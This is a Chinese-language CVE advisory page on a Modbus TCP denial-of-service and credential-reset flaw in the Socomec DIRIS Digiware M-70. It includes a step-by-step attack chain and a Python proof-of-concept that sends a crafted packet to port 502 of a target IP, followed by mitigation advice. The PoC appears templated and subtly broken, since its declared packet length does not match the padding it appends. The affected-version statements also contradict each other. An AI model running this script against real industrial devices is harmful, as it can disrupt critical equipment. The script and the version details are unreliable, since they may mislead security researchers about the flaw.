CVE-2024-49572 CVSS 7.2 高危

CVE-2024-49572 Socomec DIRIS Digiware M-70 Modbus TCP拒绝服务漏洞

披露日期: 2025-12-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2024-49572

漏洞类型

拒绝服务/凭据弱化

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Socomec DIRIS Digiware M-70

漏洞概述

CVE-2024-49572是存在于Socomec DIRIS Digiware M-70设备1.6.9版本Modbus TCP功能中的一个高危拒绝服务漏洞。该漏洞允许未经认证的网络攻击者通过发送特制的网络数据包来触发漏洞，成功利用后可导致设备拒绝服务，并可能使设备凭据被弱化至默认文档凭据。由于攻击无需认证且可通过网络远程触发，攻击者可利用此漏洞对工业控制系统环境中的关键设备进行大规模攻击，造成生产中断或数据泄露风险。

技术细节

该漏洞存在于DIRIS Digiware M-70设备的Modbus TCP协议实现中。攻击者构造特定的Modbus TCP数据包并发送至目标设备的502端口，无需任何认证即可触发漏洞。漏洞利用会导致Modbus服务异常，使设备进入不可用状态，同时可能触发凭据重置机制，将用户密码恢复为出厂默认凭据。攻击者利用此漏洞可完全控制设备访问权限。CVSS 3.1评分7.2分，攻击向量为网络级别，无需权限和用户交互即可实施攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备为Socomec DIRIS Digiware M-70，确认Modbus TCP服务运行于502端口

STEP 2

步骤2: 构造攻击数据包

攻击者构造特制的Modbus TCP数据包，包含异常数据字段用于触发漏洞

STEP 3

步骤3: 发送攻击载荷

通过TCP连接到目标502端口，无需任何认证直接发送恶意数据包

STEP 4

步骤4: 触发漏洞

特制数据包被Modbus TCP服务处理，导致服务异常和凭据弱化

STEP 5

步骤5: 后续利用

设备凭据恢复为默认凭据，攻击者可使用默认凭证完全控制设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

def cve_2024_49572_poc(target_ip, target_port=502):
    """
    CVE-2024-49572 PoC - Modbus TCP DoS for Socomec DIRIS Digiware M-70
    This PoC sends a specially crafted Modbus TCP packet to trigger the vulnerability.
    """
    # Modbus TCP Header (MBAP)
    transaction_id = struct.pack('>H', 0x0001)
    protocol_id = struct.pack('>H', 0x0000)
    length = struct.pack('>H', 0x0006)
    unit_id = struct.pack('B', 0xFF)
    
    # Modbus Function Code - Read Holding Registers
    function_code = struct.pack('B', 0x03)
    starting_address = struct.pack('>H', 0x0000)
    quantity = struct.pack('>H', 0x0001)
    
    # Craft malformed packet to trigger vulnerability
    malformed_data = b'\x00' * 100  # Malformed data
    
    packet = transaction_id + protocol_id + length + unit_id + function_code + starting_address + quantity + malformed_data
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        sock.send(packet)
        print(f"[*] Malicious packet sent to {target_ip}:{target_port}")
        sock.close()
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.100"  # Replace with target IP
    cve_2024_49572_poc(target)

影响范围

Socomec DIRIS Digiware M-70 < 1.6.9

防御指南

临时缓解措施

在网络层面限制对Modbus TCP服务(端口502)的访问，仅允许可信IP地址连接；部署入侵检测系统监控异常Modbus流量；及时关注厂商安全公告并应用最新固件更新；将设备隔离在专用VLAN中以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表